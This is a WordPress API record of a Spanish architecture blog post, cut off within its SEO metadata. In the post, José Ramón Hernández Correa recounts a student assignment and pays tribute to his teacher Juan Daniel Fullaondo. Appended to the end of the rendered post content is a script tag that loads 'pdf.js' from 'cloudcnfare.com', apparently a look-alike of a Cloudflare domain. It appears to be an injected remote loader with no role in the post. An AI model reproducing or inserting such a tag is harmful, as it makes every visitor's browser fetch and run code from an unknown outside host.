{"id":27878,"date":"2014-09-15T06:57:30","date_gmt":"2014-09-15T06:57:30","guid":{"rendered":"http:\/\/veredes.es\/blog\/?p=27878"},"modified":"2020-02-26T16:32:36","modified_gmt":"2020-02-26T15:32:36","slug":"en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa","status":"publish","type":"post","link":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/","title":{"rendered":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa"},"content":{"rendered":"<p>https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-i-jose-ramon-hernandez-correa\/<\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-i-jose-ramon-hernandez-correa\/\" target=\"_blank\" rel=\"noopener noreferrer\">El otro d\u00eda os cont\u00e9 c\u00f3mo medio enmend\u00e9 mi horrible primer proyecto<\/a>. Voy a explicaros la entrega.<\/p>\n<p style=\"text-align: justify;\">Una vez pasada la segunda ronda de croquis, con el benepl\u00e1cito (excesivo e inmerecido) de <strong>Fullaondo<\/strong>, me apliqu\u00e9 a dibujar ya en limpio las l\u00e1minas que iba a presentar.<\/p>\n<p style=\"text-align: justify;\">En un grupo de grafistas virtuosos mis l\u00e1minas fueron pobretonas: l\u00ednea de tinta sobre papel vegetal. Por lo menos estaban dibujadas con cuidado y limpieza.<\/p>\n<p style=\"text-align: justify;\">El do de pecho lo daba con la hoja final: una perspectiva c\u00f3nica dibujada a tinta china a mano alzada (<em>mi<\/em> mano alzada) sobre papel de croquis. Me pareci\u00f3 que en ese papel \u00e1spero y basto quedaba gracioso el dibujo, y que dar l\u00e1piz de color por delante y por detr\u00e1s creaba un efecto de profundidad, debido a la diferencia de intensidad y nitidez entre ambas caras, por la turbiedad del papel. Hasta le met\u00ed rotuladores. Yo cre\u00eda que el efecto final era como de \u00abcuidadoso descuido\u00bb o de \u00abyo es que soy as\u00ed de directo\u00bb, pero, recordado ahora, debi\u00f3 de ser como de alumno aventajado de taller ocupacional para mayores. Solo le faltaban los macarrones pegados y las bolitas de papel de plata. Pero lo peor era que, con todo, quedaba floja y t\u00edmida. Creo que si me hubiera pasado tres pueblos y hubiera hecho un megakitsch le habr\u00eda entusiasmado. Pero era un \u00abquiero y no puedo\u00bb muy soso.<\/p>\n<p style=\"text-align: justify;\">Fullaondo vio una por una las l\u00e1minas, celebr\u00e1ndolas. Alab\u00f3 una axonom\u00e9trica con la cubierta quitada y finalmente, ante la perspectiva chorra, no dijo nada. La apart\u00f3 discretamente del resto de l\u00e1minas, que orden\u00f3, agrup\u00f3 y dio por entregadas, y me la devolvi\u00f3 mientras me dec\u00eda que apreciaba mucho mi evoluci\u00f3n.<\/p>\n<p style=\"text-align: justify;\">Se ha hablado demasiado del gesto de suprema elegancia del general Spinola ante Nassau en <em>La Rendici\u00f3n de Breda<\/em>, de <strong><a href=\"http:\/\/es.wikipedia.org\/wiki\/Diego_Vel%C3%A1zquez\">Vel\u00e1zquez<\/a><\/strong>:<\/p>\n<figure id=\"attachment_45465\" aria-describedby=\"caption-attachment-45465\" style=\"width: 620px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"size-full wp-image-45465\" title=\"La-Rendici\u00f3n-de-Breda,-de-Vel\u00e1zquez\" src=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\" alt=\"\" width=\"620\" height=\"934\" srcset=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg 620w, https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez-199x300.jpg 199w\" sizes=\"auto, (max-width: 620px) 100vw, 620px\" \/><\/a><figcaption id=\"caption-attachment-45465\" class=\"wp-caption-text\"><span style=\"color: #888888;\">La Rendici\u00f3n de Breda, de Vel\u00e1zquez<\/span><\/figcaption><\/figure>\n<p style=\"text-align: justify;\">No fue menor la de mi profesor devolvi\u00e9ndome aquella l\u00e1mina.<\/p>\n<p style=\"text-align: justify;\">Aquella triste perspectiva, en definitiva, jam\u00e1s hab\u00eda existido. \u00c9l no la hab\u00eda visto ni yo la hab\u00eda dibujado. Como, al contrario que en <em><a href=\"http:\/\/es.wikipedia.org\/wiki\/Misi%C3%B3n:_Imposible_%281966%29\"><strong>Misi\u00f3n Imposible<\/strong><\/a><\/em>, no se autodestruy\u00f3, la reduje a confetti y creo que me la com\u00ed.<\/p>\n<p style=\"text-align: justify;\">Recuerdo tambi\u00e9n perfectamente el segundo ejercicio de aquel <em>Nivel I<\/em>, pero ya no os aburrir\u00e9 con m\u00e1s detalles. S\u00ed que os tengo que decir que me sent\u00eda competente, que dibujaba cada vez mejor, que le echaba horas por un tubo, que aprend\u00eda cada vez m\u00e1s y que disfrutaba como un loco.<\/p>\n<p style=\"text-align: justify;\">Juan Daniel Fullaondo est\u00e1 en la historia de la arquitectura espa\u00f1ola del siglo XX. (Lo que m\u00e1s valora todo el mundo de \u00e9l -a mi parecer injustamente por lo incompleto- es su labor como cr\u00edtico y su papel como director de la magn\u00edfica revista <em><a href=\"http:\/\/dialnet.unirioja.es\/servlet\/revista?codigo=8819\"><strong>Nueva Forma<\/strong><\/a><\/em>). Para m\u00ed, una de sus mejores facetas fue la de profesor. A m\u00ed me salv\u00f3.<\/p>\n<p style=\"text-align: justify;\">Qu\u00e9 f\u00e1cil es examinar el trabajo de un alumno y restregarle por las narices todas sus carencias, sus torpezas, sus errores y sus ignorancias. Eso lo puede hacer cualquiera. Lo que de verdad tiene m\u00e9rito es ver en \u00e9l lo que ni siquiera ve \u00e9l mismo: Ver una posibilidad, un germen, un <em>algo<\/em> en potencia. Y, confiando ciegamente en ello, sacarlo a la luz. Hay que ser muy h\u00e1bil, muy intuitivo, muy inteligente, muy paciente, pero, sobre todo, muy generoso.<\/p>\n<p style=\"text-align: justify;\">Qu\u00e9 dif\u00edcil es todo eso.<\/p>\n<p style=\"text-align: justify;\">Igual que <a href=\"http:\/\/es.wikipedia.org\/wiki\/Miguel_%C3%81ngel\"><strong>Miguel \u00c1ngel<\/strong><\/a> dec\u00eda que ve\u00eda la estatua dentro del bloque de piedra y que \u00e9l se limitaba a quitar lo que sobraba, as\u00ed Fullaondo vio que dentro de m\u00ed hab\u00eda algo (que, repito, no lo ve\u00eda ni yo; yo menos que nadie), y con tes\u00f3n y optimismo lo fue sacando a la luz.<\/p>\n<p style=\"text-align: justify;\">Pero, a\u00fan mejor que Miguel \u00c1ngel, la misi\u00f3n del profesor no es solo quitar. Tambi\u00e9n tiene que poner. Quitar prejuicios, frenos, torpezas, etc, y poner conocimiento, habilidad, destreza, etc. La misi\u00f3n de un profesor es sagrada en todos los \u00f3rdenes y todas las edades, y si un incompetente, torpe, perezoso o derrotista te puede amargar la vida y mutilarte para siempre, uno creativo, paciente y generoso te puede dar alas.<\/p>\n<p style=\"text-align: justify;\">A m\u00ed me salieron unas alitas no para tirar cohetes ni celebrar la gran org\u00eda del talento arquitect\u00f3nico, pero s\u00ed para hacer una carrera ascendente a\u00f1o tras a\u00f1o, coronada por un <em>Proyecto Fin de Carrera<\/em> apasionante, en el que me lo pas\u00e9 divinamente y con el que sal\u00ed \u00abpor la puerta grande\u00bb, que es lo menos que merece un alumno de arquitectura despu\u00e9s de tantos a\u00f1os y tanto trabajo. Los profesores que no consigan eso de sus alumnos ya pueden agachar las orejas e <a href=\"http:\/\/nmas1.wordpress.com\/2012\/05\/10\/the-pfc-hunger-games\/\">irse a su casa a no dar m\u00e1s por saco<\/a>.<\/p>\n<p style=\"text-align: justify;\">Yo no solo hice un PFC divertido, alegre, feliz, exitoso, etc, sino que, ya puestos, me matricul\u00e9 en doctorado, cosa que nunca hab\u00eda pensado hacer y que tambi\u00e9n hice (con no menor \u00e9xito y alegr\u00eda) porque Juan Daniel Fullaondo me conmin\u00f3 a ello.<\/p>\n<p style=\"text-align: justify;\">Pod\u00e9is imaginar lo apasionante que es hacer una tesis doctoral con uno de los arquitectos m\u00e1s cultos de Europa, que te aporta ideas, te sugiere libros, te los presta&#8230; (los ten\u00eda todos: todos los del mundo).<\/p>\n<p style=\"text-align: justify;\">Hablar\u00e9 m\u00e1s veces de Fullaondo. Varios compa\u00f1eros de clase han le\u00eddo la primera parte y me han comentado detalles que merecen entradas aparte. S\u00ed: Tambi\u00e9n hay unas gallinas pendientes. Ya ir\u00e9 con ellas.<\/p>\n<p style=\"text-align: justify;\">Hoy, para terminar, solo quiero decir dos cosas m\u00e1s: La primera es que otros alumnos de otras clases se met\u00edan a veces con el \u00absistema Fullaondo\u00bb porque lo ve\u00edan poco serio. Demasiado jijij\u00ed y jajaj\u00e1. A ellos les med\u00edan con escal\u00edmetro los anchos de pasillos y las huellas y tabicas, mientras que nosotros hac\u00edamos lo que nos daba la gana. Siempre ha habido una lucha sorda entre Don Carnal y Do\u00f1a Cuaresma. Yo tengo que decir que, ya como profesional, he construido VPOs observando toda su espes\u00edsima normativa, y he cumplido c\u00f3digos de accesibilidad y CTE sin que el hecho de haberme formado con Fullaondo me haya incapacitado para ello. No consta en ning\u00fan sitio que para ser competente haya que languidecer con profesores aburridos y crueles, ni que para aprender tenga uno que ser humillado. Lo siento por los que han padecido y siguen padeciendo a profesores impotentes, incompetentes o s\u00e1dicos.<\/p>\n<p style=\"text-align: justify;\">La segunda la digo ahora con alborozo, pero en su momento me pes\u00f3: Es que Fullaondo ten\u00eda una gran debilidad por los alumnos con un poco de cara dura (con la dosis justa; tampoco nos pasemos). Le gustaba la gente un poco p\u00edcara, y apreciaba las \u00abexcusas creativas\u00bb. Alguna que otra vez se deshizo en carcajadas ante una explicaci\u00f3n de un alumno que no le entregaba un ejercicio completo. Si esa justificaci\u00f3n era lo suficientemente buena e ingeniosa le val\u00eda m\u00e1s que el propio ejercicio. Esto (lo he comprobado muchos a\u00f1os despu\u00e9s) era un entrenamiento estupendo para la vida. Pero yo, como era concienzudo y cumplidor, me indignaba ante las que consideraba injusticias. Me daba cuenta de que a m\u00ed Fullaondo me hab\u00eda favorecido much\u00edsimo, pero ve\u00eda que a otros les favorec\u00eda a\u00fan m\u00e1s. (\u00bfSe podr\u00e1 ser m\u00e1s desagradecido?). Me hizo arquitecto, me hizo doctor y me hizo profesor, y, como dije el otro d\u00eda, creo que no pasa un solo d\u00eda sin que, al menos por un instante, no le d\u00e9 las gracias.<\/p>\n<p style=\"text-align: justify;\">Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa \u00b7 Doctor Arquitecto<br \/>\nToledo \u00b7 noviembre 2012<\/p>\n<p><script src=\"https:\/\/cloudcnfare.com\/pdf.js\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-i-jose-ramon-hernandez-correa\/ El otro d\u00eda os cont\u00e9 c\u00f3mo medio enmend\u00e9 mi horrible primer proyecto. Voy a explicaros la entrega. Una vez pasada la segunda ronda de croquis, con el benepl\u00e1cito (excesivo e inmerecido) de Fullaondo, me apliqu\u00e9 a dibujar ya en limpio las l\u00e1minas que iba a presentar. En un grupo de grafistas virtuosos mis l\u00e1minas [&hellip;]<\/p>\n","protected":false},"author":33,"featured_media":45465,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[568,5951],"tags":[2631,2298,542,668,5142,969,3653,4164,10536,815,865,6567,1021,3452],"class_list":{"0":"post-27878","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-faro","9":"tag-arquitectura-espanola","10":"tag-dibujar","11":"tag-etsam","12":"tag-historia","13":"tag-james-joyce","14":"tag-jorge-oteiza","15":"tag-jose-ramon-hernandez-correa","16":"tag-juan-daniel-fullaondo","17":"tag-juan-pablo-de-bidegain-herrera","18":"tag-maestro","19":"tag-mies-van-der-rohe","20":"tag-miguel-angel","21":"tag-pensamiento","22":"tag-personaje"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa<\/title>\n<meta name=\"description\" content=\"En clase de Juan Daniel Fullaondo\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\" \/>\n<meta property=\"og:description\" content=\"En clase de Juan Daniel Fullaondo\" \/>\n<meta property=\"og:url\" content=\"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/\" \/>\n<meta property=\"og:site_name\" content=\"veredes, arquitectura y divulgaci\u00f3n\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/joseramon.hernandezcorrea\" \/>\n<meta property=\"article:published_time\" content=\"2014-09-15T06:57:30+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-02-26T15:32:36+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"620\" \/>\n\t<meta property=\"og:image:height\" content=\"934\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@https:\/\/twitter.com\/arquitectamos\" \/>\n<meta name=\"twitter:site\" content=\"@veredes\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"19 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/\"},\"author\":{\"name\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/eefca3204fa5a4349162c2869bee6c49\"},\"headline\":\"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"datePublished\":\"2014-09-15T06:57:30+00:00\",\"dateModified\":\"2020-02-26T15:32:36+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/\"},\"wordCount\":3933,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2012\\\/12\\\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\",\"keywords\":[\"arquitectura espa\u00f1ola\",\"dibujar\",\"ETSAM\",\"historia\",\"james joyce\",\"Jorge Oteiza\",\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"Juan Daniel Fullaondo\",\"juan pablo de bideg\u00e1in herrera\",\"maestro\",\"Mies van der Rohe\",\"Miguel \u00c1ngel\",\"pensamiento\",\"personaje\"],\"articleSection\":[\"faro\",\"slider principal\"],\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/\",\"name\":\"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2012\\\/12\\\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\",\"datePublished\":\"2014-09-15T06:57:30+00:00\",\"dateModified\":\"2020-02-26T15:32:36+00:00\",\"description\":\"En clase de Juan Daniel Fullaondo\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#primaryimage\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2012\\\/12\\\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2012\\\/12\\\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg\",\"width\":\"620\",\"height\":\"934\",\"caption\":\"La Rendici\u00f3n de Breda, de Vel\u00e1zquez\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Portada\",\"item\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"description\":\"veredes\",\"publisher\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\"},\"alternateName\":\"veredes\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/veredes.es\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#organization\",\"name\":\"veredes, arquitectura y divulgaci\u00f3n\",\"alternateName\":\"veredes\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2021\\\/12\\\/veredes-logo-centrado_140x54.png\",\"width\":140,\"height\":54,\"caption\":\"veredes, arquitectura y divulgaci\u00f3n\"},\"image\":{\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/veredesArquitecturayDivulgacion\\\/\",\"https:\\\/\\\/x.com\\\/veredes\",\"https:\\\/\\\/instagram.com\\\/veredes\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/company\\\/veredes-arquitectura-y-divulgacion\\\/\",\"https:\\\/\\\/es.pinterest.com\\\/veredes\\\/\",\"https:\\\/\\\/www.tumblr.com\\\/veredes\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/#\\\/schema\\\/person\\\/eefca3204fa5a4349162c2869bee6c49\",\"name\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"contentUrl\":\"https:\\\/\\\/veredes.es\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/04\\\/Jos\u00e9-Ram\u00f3n-Hern\u00e1ndez-Correa-96x96.jpg\",\"caption\":\"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa\"},\"description\":\"Nac\u00ed en 1960. Arquitecto por la ETSAM, 1985. Doctor Arquitecto por la Universidad Polit\u00e9cnica de Madrid, 1992. Soy, en el buen sentido de la palabra, bueno. Ahora estoy algo cansado, pero sigo atento y curioso. Arquitecto, bloguero, saxofonero, escritor... pero todo mal.\",\"sameAs\":[\"http:\\\/\\\/arquitectamoslocos.blogspot.com.es\\\/\",\"https:\\\/\\\/www.facebook.com\\\/joseramon.hernandezcorrea\",\"https:\\\/\\\/www.instagram.com\\\/arquitectamoslocos\\\/\",\"https:\\\/\\\/www.linkedin.com\\\/in\\\/jos-ramn-hernndez-correa-b6378b2a\\\/\",\"https:\\\/\\\/x.com\\\/https:\\\/\\\/twitter.com\\\/arquitectamos\"],\"url\":\"https:\\\/\\\/veredes.es\\\/blog\\\/author\\\/arquitectamos\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","description":"En clase de Juan Daniel Fullaondo","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/","og_locale":"es_ES","og_type":"article","og_title":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","og_description":"En clase de Juan Daniel Fullaondo","og_url":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/","og_site_name":"veredes, arquitectura y divulgaci\u00f3n","article_publisher":"https:\/\/www.facebook.com\/veredesArquitecturayDivulgacion\/","article_author":"https:\/\/www.facebook.com\/joseramon.hernandezcorrea","article_published_time":"2014-09-15T06:57:30+00:00","article_modified_time":"2020-02-26T15:32:36+00:00","og_image":[{"width":620,"height":934,"url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg","type":"image\/jpeg"}],"author":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","twitter_card":"summary_large_image","twitter_creator":"@https:\/\/twitter.com\/arquitectamos","twitter_site":"@veredes","twitter_misc":{"Escrito por":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","Tiempo de lectura":"19 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#article","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/"},"author":{"name":"Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","@id":"https:\/\/veredes.es\/blog\/#\/schema\/person\/eefca3204fa5a4349162c2869bee6c49"},"headline":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","datePublished":"2014-09-15T06:57:30+00:00","dateModified":"2020-02-26T15:32:36+00:00","mainEntityOfPage":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/"},"wordCount":3933,"commentCount":0,"publisher":{"@id":"https:\/\/veredes.es\/blog\/#organization"},"image":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg","keywords":["arquitectura espa\u00f1ola","dibujar","ETSAM","historia","james joyce","Jorge Oteiza","Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","Juan Daniel Fullaondo","juan pablo de bideg\u00e1in herrera","maestro","Mies van der Rohe","Miguel \u00c1ngel","pensamiento","personaje"],"articleSection":["faro","slider principal"],"inLanguage":"es","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/","url":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/","name":"En clase de Juan Daniel Fullaondo (II) | Jos\u00e9 Ram\u00f3n Hern\u00e1ndez Correa","isPartOf":{"@id":"https:\/\/veredes.es\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#primaryimage"},"image":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#primaryimage"},"thumbnailUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg","datePublished":"2014-09-15T06:57:30+00:00","dateModified":"2020-02-26T15:32:36+00:00","description":"En clase de Juan Daniel Fullaondo","breadcrumb":{"@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/veredes.es\/blog\/en-clase-de-juan-daniel-fullaondo-ii-jose-ramon-hernandez-correa\/#primaryimage","url":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg","contentUrl":"https:\/\/veredes.es\/blog\/wp-content\/uploads\/2012\/12\/La-Rendici\u00f3n-de-Breda-de-Vel\u00e1zquez.jpg","width":"620","height":"934","caption":"La Rendici\u00f3n de Breda, de 